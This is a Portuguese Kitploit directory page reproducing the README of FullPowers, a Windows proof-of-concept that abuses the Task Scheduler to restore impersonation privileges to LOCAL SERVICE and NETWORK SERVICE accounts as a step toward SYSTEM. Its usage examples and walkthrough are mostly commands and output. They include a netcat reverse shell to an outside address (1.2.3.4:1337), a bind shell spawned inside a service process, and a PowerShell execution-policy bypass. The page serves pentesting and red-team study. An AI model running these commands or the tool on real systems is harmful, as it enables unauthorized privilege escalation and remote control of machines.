Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
FullPowers — Recuperar o conjunto de privilégios padrão de uma conta LOCAL/NETWORK SERVICE | Kitploit
Ferramentas/GitHubGitHub/itm4n/fullpowers
Escalada de PrivilégiosExploraçãoPós-ExploraçãoTestes de PenetraçãoRed TeamingArchived
GitHubitm4n/fullpowers

FullPowers

Recuperar o conjunto de privilégios padrão de uma conta LOCAL/NETWORK SERVICE

Ver Repositório
700102há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

FullPowers

FullPowers é uma ferramenta de Prova de Conceito que fiz para recuperar automaticamente o conjunto de privilégios padrão de uma conta de serviço, incluindo SeAssignPrimaryToken e SeImpersonate.

Fundamentação

No Windows, alguns serviços executados como LOCAL SERVICE ou NETWORK SERVICE são configurados para executar com um conjunto restrito de privilégios. Portanto, mesmo que o serviço seja comprometido, você não obterá os privilégios dourados de impersonação e a escalada de privilégios para LOCAL SYSTEM deve ser mais complicada. No entanto, descobri que, quando você cria uma tarefa agendada, o novo processo criado pelo Serviço de Agendador de Tarefas tem todos os privilégios padrão da conta de usuário associada (exceto SeImpersonate). Portanto, com algumas manipulações de token, você pode gerar um novo processo com todos os privilégios ausentes.

Para mais informações: https://itm4n.github.io/localservice-privileges/

Utilização

⚠️ Esta ferramenta deve ser executada apenas como LOCAL SERVICE ou NETWORK SERVICE.

Você pode verificar a mensagem de ajuda usando a opção -h.

root@kitploit:~
c:\TOOLS>FullPowers -h

FullPowers v0.1 (by @itm4n)

  This tool leverages the Task Scheduler to recover the default privilege set of a service account.
  For more information: https://itm4n.github.io/localservice-privileges/

Optional arguments:
  -v              Verbose mode, used for debugging essentially
  -c <CMD>        Custom command line to execute (default is 'C:\Windows\System32\cmd.exe')
  -x              Try to get the extended set of privileges (might fail with NETWORK SERVICE)
  -z              Non-interactive, create a new process and exit (default is 'interact with the new process')

Exemplo 1, uso básico

root@kitploit:~
c:\TOOLS>FullPowers
[+] Successfully created scheduled task. PID=9976
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

Exemplo 2, especificar uma linha de comando personalizada

root@kitploit:~
c:\TOOLS>FullPowers -c "powershell -ep Bypass"
[+] Successfully created scheduled task. PID=9028
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> Get-ExecutionPolicy
Bypass

Exemplo 3, iniciar um netcat reverse shell e sair

root@kitploit:~
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
[+] Successfully created scheduled task. PID=5482
[+] CreateProcessAsUser() OK

Como Fazer

Você quer testar esta PoC você mesmo? Isso é ótimo! Aqui estão algumas instruções simples para começar.

A ideia geral é iniciar um bindshell a partir do processo de um serviço existente, conectar-se a ele e depois executar o executável.

  1. Você precisará de 2 ferramentas de terceiros, netcat e RunFromProcess.
  2. Escolha um serviço que tenha privilégios limitados, ex.: upnphost.
  3. Abra o Gerenciador de Tarefas, vá para a guia Serviços e obtenha o PID do processo correspondente.
  4. Use o seguinte comando para iniciar o bindshell como administrador:
root@kitploit:~
C:\TOOLS>RunFromProcess-x64.exe <PID> C:\TOOLS\nc64.exe -l -p 9001 -e cmd
  1. Use o seguinte comando para conectar ao bindshell:
root@kitploit:~
C:\TOOLS>nc64.exe 127.0.0.1 9001
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects    Enabled
  1. Podemos ver que o processo atual não tem privilégios de impersonação. Agora execute a PoC...
root@kitploit:~
c:\TOOLS>FullPowers
[+] Started dummy thread with id 5568
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

Você deve agora ter um shell com privilégios de impersonação!

Baixar ferramenta